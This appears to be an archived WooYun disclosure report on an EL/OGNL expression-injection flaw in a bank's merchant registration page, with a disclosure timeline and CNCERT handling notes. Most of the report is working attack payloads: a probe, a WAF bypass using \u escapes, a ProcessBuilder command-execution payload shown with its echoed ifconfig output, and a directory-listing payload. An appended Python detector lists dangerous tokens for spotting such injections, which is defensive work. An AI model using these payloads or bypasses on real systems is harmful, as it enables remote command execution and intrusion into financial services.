WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-04-14: Details reported to the vendor, awaiting vendor response
2016-04-18: Vendor confirmed; details disclosed to the vendor only
2016-04-28: Details disclosed to core white hats and relevant domain experts
2016-05-08: Details disclosed to regular white hats
2016-05-18: Details disclosed to intern white hats
2016-06-02: Details disclosed to the public
This vulnerability only affects rich people; WooYun owes me a lightning bolt.
#1 Vulnerability description
EL expression syntax lets developers define custom functions that call methods of Java classes.
#2 Affected server
http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml
#3 Payload
groupName=1&papersType=${9999999-444}&papersValue=1&baseacct=1&retMsg=1&retCode=1
#4 WAF bypass
http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtmlcompanyName=999&groupName=&papersType=${"a9999abbb".toString\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1
#5 Command execution with echoed output
groupName=1&papersType=${%23a%3d\u0028new%20java.lang.ProcessBuilder\u0028new%20java.lang.String[]{\u0027/sbin/ifconfig\u0027,\u0027-a\u0027}\u0029\u0029.start\u0028\u0029,%23b%3d%23a.getInputStream\u0028\u0029,%23c%3dnew%**.**.**.**.InputStreamReader\u0028%23b\u0029,%23d%3dnew%**.**.**.**.BufferedReader\u0028%23c\u0029,%23e%3dnew%20char[50000],%23d.read\u0028%23e\u0029,%23ringzero%3d%23context.get\u0028\u0027com.opensymphony.xwork2.dispatcher.HttpServletResponse\u0027\u0029,%23ringzero.getWriter\u0028\u0029.println\u0028%23e\u0029,%23ringzero.getWriter\u0028\u0029.flush\u0028\u0029,%23ringzero.getWriter\u0028\u0029.close\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1
${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'/sbin/ifconfig','-a'})).start(),#b=#a.getInputStream(),#c=new **.**.**.**.InputStreamReader(#b),#d=new **.**.**.**.BufferedReader(#c),#e=new char[50000],#d.read(#e),#ringzero=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#ringzero.getWriter().println(#e),#ringzero.getWriter().flush(),#ringzero.getWriter().close()}
eth5 Link encap:Ethernet HWaddr 00:50:56:97:7A:74
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5603928546 errors:0 dropped:0 overruns:0 frame:0
TX packets:8131434126 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:735168104896 (701110.9 Mb) TX bytes:11750604019014 (11206249.2 Mb)

lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:51371053 errors:0 dropped:0 overruns:0 frame:0
TX packets:51371053 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:25387430681 (24211.3 Mb) TX bytes:25387430681 (24211.3 Mb)
#6 Directory listing
groupName=1&papersType=${new **.**.**.**.File(\u0027/\u0027).listFiles()[1]}&papersValue=1&baseacct=1&retMsg=1&retCode=1
# Fix: expressions must not be invokable from client-supplied input
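As an added defender-side example (not part of the original report), the following Python check normalizes the encodings used in the WAF bypass above (percent-encoding and Java-style \uXXXX escapes) before looking for expression openers in request parameters, so that `toString\u0028\u0029` is matched as `toString()`. The sample query strings are constructed after the payload shapes in this report; masked values stay as placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample query strings modelled on the payload shapes in this
# report: parentheses hidden as \u0028/\u0029, '#', '=' and quotes percent-encoded.
SAMPLES = [
    "groupName=1&papersType=${9999999-444}&papersValue=1",
    r'companyName=999&papersType=${"a9999abbb".toString\u0028\u0029}&papersValue=1',
    r"groupName=1&papersType=${%23a%3d\u0028new%20java.lang.ProcessBuilder\u0028"
    r"new%20java.lang.String[]{\u0027/sbin/ifconfig\u0027}\u0029\u0029.start\u0028\u0029}"
    "&papersValue=1",
    "groupName=1&papersType=CN&papersValue=1&baseacct=1",   # benign request
]

_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_EXPR_OPEN = re.compile(r"[$#%]\{")      # ${ ... }, #{ ... }, %{ ... }
# Tokens that turn a probe into code or file-system access (all seen in this report).
_DANGEROUS = ("ProcessBuilder", "Runtime", "getInputStream", "#context", "listFiles")


def normalize(value: str) -> str:
    """Undo the layers a WAF bypass relies on: repeated percent-decoding,
    then \\uXXXX escapes, so the value is compared in its evaluated form."""
    for _ in range(2):                   # tolerate double-encoded input
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), value)


def find_expression_injection(query: str) -> list[tuple[str, str, bool]]:
    """Return (parameter, normalized value, command-exec flag) for every
    parameter whose decoded value opens an expression."""
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)
        if _EXPR_OPEN.search(value):
            severe = any(tok in value for tok in _DANGEROUS)
            hits.append((name, value, severe))
    return hits


if __name__ == "__main__":
    for q in SAMPLES:
        for name, value, severe in find_expression_injection(q):
            print(f"{'RCE' if severe else 'probe':5} {name}={value}")
```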
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-04-18 15:23
CNVD confirmed and reproduced the reported issue; it has been forwarded by CNCERT directly to the affected bank group, which will coordinate follow-up handling with the website administration department.
None yet